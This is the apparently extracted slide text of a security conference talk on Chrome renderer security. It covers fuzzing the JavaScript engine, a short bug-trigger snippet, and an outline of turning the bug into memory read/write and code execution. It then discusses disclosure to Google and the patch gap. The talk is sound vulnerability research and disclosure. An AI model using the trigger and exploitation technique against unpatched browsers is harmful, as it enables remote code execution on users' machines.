Browser Security Beyond Sandboxing - bluehatil.com Security Beyond Sandboxing.pdf · Servicing...
Transcript of Browser Security Beyond Sandboxing - bluehatil.com Security Beyond Sandboxing.pdf · Servicing...
Browser Security Beyond SandboxingJORDAN RABET, MICROSOFT OSR
Who am I
Computer Science, Applied Math, AI, CV
Formerly
Presently
OSRExploit things, Mitigate things
@smealum
What I’m going to talk about
Browser Security Beyond Sandboxing…?
Live demo halfway through!
A difference in security strategy
- Justin Schuh, Chrome security lead
The result: a strong sandbox…
Renderer process
#0
Renderer process
#1Renderer process
#...GPU process
PPAPI processBrowser process
The result: …and a soft RCE target
Finding a bug: fuzzing!Ran a JavaScript fuzzer written by the Chakra team…
…using a fuzzing harness put together by the Security Assurance team…
…on Azure!
=> got an exploitable bug after less than a day of fuzzing
Figuring out the bugvar func0 = function(f)
{
var o =
{
a: {},
b:
{
ba: { baa: 1.2, bab: [] },
bb: {},
bc: { bca: { bcaa: 0, bcab: 0, bcac: this } },
}
};
o.b.bc.bca.bcab = 0;
o.b.bb.bba = Object.toString(o.b.ba.bab);
};
while(true) func0()
Object.toString(o.b.ba.bab)
Object.toString(o.b.ba.bab)
while(true)
var o = { a: {}, b: {...} }b: { ba: {...}, bb: {}, bc: {...} }
ba: { baa: 1.2, bab: [] }
o.b.ba.bab
Object.toString(o.b.ba.bab)
o.b.ba.bab
Object.toString(o.b.ba.bab)
b: { ba: {...},
bb: {},
bc: {...}
}
Bug modifier #1: attribute type
Bug modifier #2: attribute offset
Bug modifier #3: local variable spray
Resulting bug capabilities
Type being sprayed Type being loaded Result
JavaScript object Double value Infoleak
Double value Double value Arbitrary read primitive
Double value JavaScript object Arbitrary JavaScript object manufacturing
Achieving code executionWe can manufacture arbitrary JavaScript objects
Create a fake ArrayBuffer object and use that to read/write arbitrary memory
Use read/write to load a overwrite RWX code…
Recap so far
Renderer process
#0
Renderer process
#1Renderer process
#...GPU process
PPAPI processBrowser process
WE ARE HERE
DEMO TIME
Multiple origins in the same process
“Immortal” pop-undersUser interaction checks are renderer-side
window.onbeforeunload
JS backdoor for advanced shenanigans
UXSS
AftermathBug was reported to Google
Bug was fixed by disabling old escape analysis implementation in just 4 days!
Fix made it to stable channel 3 days later
=> Impressive response time and agility from Google
Servicing procedureSecurity bug fixes are published before they make it into official builds
Fixes often come with regression tests, giving a PoC
Lack of RCE mitigations makes many bugs easy to exploit
The fix didn’t ship to stable channel Chrome until 30 days later
=> Google regularly 0-days itself, which is not great
Site isolation
ConclusionBrowser RCE is still a serious threat
How bugs are serviced matters
Thank you for your time!CONTACT: [email protected]
@smealum